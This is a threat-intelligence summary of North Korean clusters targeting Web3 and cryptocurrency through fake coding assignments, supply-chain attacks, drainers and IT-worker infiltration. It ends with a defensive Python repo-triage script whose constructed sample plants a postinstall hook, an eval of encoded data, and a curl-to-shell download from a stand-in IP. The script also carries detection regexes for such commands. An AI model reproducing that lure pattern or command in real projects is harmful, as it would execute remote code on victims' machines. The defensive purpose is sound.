Full Report
Multiple threat activity clusters with ties to North Korea (aka Democratic People's Republic of Korea or DPRK) have been linked to attacks targeting organizations and individuals in the Web3 and cryptocurrency space. "The focus on Web3 and cryptocurrency appears to be primarily financially motivated due to the heavy sanctions that have been placed on North Korea," Google-owned Mandiant said in
Analysis Summary
# Threat Actor: North Korea (DPRK) Nexus Threat Actors
## Attribution & Identity
Attribution is tied to the Democratic People's Republic of Korea (DPRK). Multiple distinct activity clusters are tracked, including: **UNC1069**, **UNC4899**, **UNC5342**, **UNC4736**, **UNC3782**, and **UNC5267** (associated with the mass remote employment scheme). UNC4899 overlaps with **Jade Sleet**, **PUKCHONG**, **Slow Pisces**, and **TraderTraitor**. UNC5342 overlaps with **Contagious Interview**, **DeceptiveDevelopment**, **DEV#POPPER**, and **Famous Chollima**. A significant portion of IT workers involved in the remote employment scheme are affiliated with the **313 General Bureau of the Munitions Industry Department**.
## Activity Summary
Threat clusters are heavily focused on generating illicit financial gains, primarily targeting the **Web3 and cryptocurrency space** to circumvent international sanctions and fund North Korea's WMD program.
* **UNC1069** targets diverse industries for financial gain using social engineering.
* **UNC4899** and **UNC5342** target developers in the blockchain community, often using job-themed lures to deliver malware via fake coding assignments. They have also engaged in supply chain compromises.
* **UNC4736** specifically targets the blockchain industry by trojanizing trading software applications (attributed to the 3CX supply chain attack in early 2023).
* **UNC3782** conducts large-scale phishing campaigns against cryptocurrency users (e.g., against TRON and Solana users in 2023/2024) deploying drainer malware.
* **UNC5267** and associated clusters cover thousands of DPRK citizens who take remote IT jobs with employers in the U.S., Europe, and Asia under stolen or fabricated identities (including deepfakes during interviews) in order to maintain long-term network access, extort employers, and funnel salaries back to Pyongyang. These IT workers increasingly conduct insider attacks from their privileged positions: stealing data, extorting their employers, and enabling follow-on cyberattacks.
## Tactics, Techniques & Procedures
- Developing custom tools across multiple languages, including Golang, C++, and Rust.
- Exploiting trust within the Web3/blockchain community via job-themed social engineering lures.
- Delivering malware through employment opportunities disguised as coding assignments.
- Orchestrating supply chain compromises (e.g., UNC4736).
- Conducting large-scale phishing operations aimed at cryptocurrency drainer deployment.
- Utilizing sophisticated identity manipulation, including deepfake technology, to conceal operative identities during remote job interviews, allowing a single operator to use multiple personas.
- Leveraging privileged access obtained via long-term infiltration (DPRK IT worker scheme) for data theft and extortion.
## Targeting
- Sectors: Web3, cryptocurrency, blockchain development, and technology sectors.
- Geography: Organizations and individuals are targeted globally; DPRK IT workers, who reside primarily in China and Russia, have been placed with employers in the U.S., Europe, and Asia.
- Victims: Cryptocurrency and blockchain developers; TRON and Solana users; organizations employing DPRK IT workers.
## Tools & Infrastructure
- Malware development utilizing Golang, C++, and Rust.
- Cryptocurrency drainers (used by UNC3782).
- Custom tools capable of infecting Windows, Linux, and macOS operating systems.
- Infrastructure associated with the supply chain attacks (the excerpt describes the activity but names no specific malware families or C2 infrastructure).
- **Synthetic Identities**: Use of fabricated personas and deepfake technology for operational security.
## Implications
The primary strategic implication is the DPRK’s dedicated effort to bypass severe international sanctions through massive, targeted cryptocurrency theft. The increasing sophistication of their IT worker infiltration scheme, utilizing deepfakes and maintaining long-term roles within target organizations, poses a significant insider threat risk that enables both revenue generation and direct access for subsequent cyber operations.
## Mitigations
- Heightened vigilance in vetting remote employees, especially IT professionals, including enhanced background checks and scrutiny of video interviews for signs of synthetic or deepfaked identity, since a single operator may present several personas.
- Strict network segmentation and strong privileged access management (PAM) to limit lateral movement by malicious insiders, including IT workers hired under false identities.
- Endpoint detection with coverage for Windows, Linux, and macOS, since the clusters' custom tooling targets all three.
- Security awareness training focused on job-offer and investment-themed social engineering in the cryptocurrency sector, including unsolicited coding assignments from recruiters, which should be opened only in an isolated environment.
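The fake coding assignment lure listed under Tactics, Techniques & Procedures and the awareness-training mitigation above both come down to one question for a developer handed a "take-home" repository by a recruiter: does the project do anything besides the assignment? The following Python script is an added example written for this page, not tooling from Mandiant or from the report. Its heuristics are assumptions of the example rather than indicators published in the report: npm lifecycle hooks in package.json (which run during `npm install` with no user action), very long or base64-heavy lines, `eval`/`child_process` use, download-and-execute shell pipes, and URLs pointing at raw IP addresses. It builds a constructed sample repository in a temporary directory (the address 203.0.113.10 is from the documentation range) so it runs offline; point `triage_repo()` at a real clone to use it.

```python
"""Triage a recruiter-supplied 'coding assignment' repo for malware-lure red flags.

Added example for this page; the heuristics below are assumptions, not
indicators taken from the report.
"""
import base64
import json
import re
import tempfile
from pathlib import Path

# npm runs these automatically on `npm install`, so a lure can execute code
# before the candidate ever opens the assignment in an editor.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Each pattern is a heuristic chosen for this example (assumption, not from the report).
SUSPICIOUS_PATTERNS = {
    "eval_or_function_ctor": re.compile(r"\beval\s*\(|new\s+Function\s*\("),
    "child_process": re.compile(r"child_process|\bexec(?:Sync)?\s*\("),
    "download_then_run": re.compile(r"\b(?:curl|wget)\b[^|\n]*\|\s*(?:ba)?sh\b"),
    "raw_ip_url": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?"),
    "base64_blob": re.compile(r"[A-Za-z0-9+/]{200,}={0,2}"),
}
LONG_LINE = 1000  # minified or obfuscated payload lines are routinely far longer
SOURCE_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".py", ".sh", ".json"}


def scan_text(rel_path, text):
    """Return (path, line_no, rule) tuples for every line that trips a heuristic."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        if len(line) > LONG_LINE:
            findings.append((rel_path, line_no, "long_line"))
        for rule, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                findings.append((rel_path, line_no, rule))
    return findings


def scan_package_json(rel_path, text):
    """Flag lifecycle hooks, which execute during `npm install` without user action."""
    try:
        manifest = json.loads(text)
    except json.JSONDecodeError:
        return [(rel_path, 0, "unparseable_package_json")]
    scripts = manifest.get("scripts") or {}
    return [(rel_path, 0, f"lifecycle_hook:{hook}") for hook in LIFECYCLE_HOOKS if hook in scripts]


def triage_repo(root):
    """Walk a cloned repository (skipping node_modules) and collect all findings."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file() or path.suffix not in SOURCE_SUFFIXES or "node_modules" in path.parts:
            continue
        rel = path.relative_to(root).as_posix()
        text = path.read_text(encoding="utf-8", errors="replace")
        if path.name == "package.json":
            findings.extend(scan_package_json(rel, text))
        findings.extend(scan_text(rel, text))
    return findings


def build_sample_repo(root):
    """Write a constructed sample assignment: one clean module, one lure-style helper."""
    root = Path(root)
    (root / "src").mkdir(parents=True)
    (root / "lib").mkdir()
    (root / "package.json").write_text(json.dumps({
        "name": "trading-widget", "version": "1.0.0",
        "scripts": {"test": "jest", "postinstall": "node ./lib/setup.js"},
    }, indent=2))
    (root / "src" / "index.js").write_text(
        "module.exports = function add(a, b) { return a + b; };\n")
    blob = base64.b64encode(b"x" * 200).decode()  # stands in for an encoded second stage
    padding = json.dumps(["a" * 50] * 30)          # stands in for an obfuscator's string table
    (root / "lib" / "setup.js").write_text(
        f"var _0x = {padding};\n"
        f'eval(Buffer.from("{blob}", "base64").toString());\n'
        'require("child_process").execSync("curl http://203.0.113.10:8080/p | sh");\n')


def demo():
    """Build the constructed sample in a temporary directory and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_repo(tmp)
        return triage_repo(tmp)


if __name__ == "__main__":
    for rel, line_no, rule in demo():
        print(f"{rel}:{line_no}: {rule}")
```

A hit is not proof of malice (build tooling legitimately uses lifecycle hooks and `child_process`), but any hit in a repository that arrived unsolicited from a recruiter is reason to stop, not to run `npm install` on a workstation that holds wallet keys or production credentials.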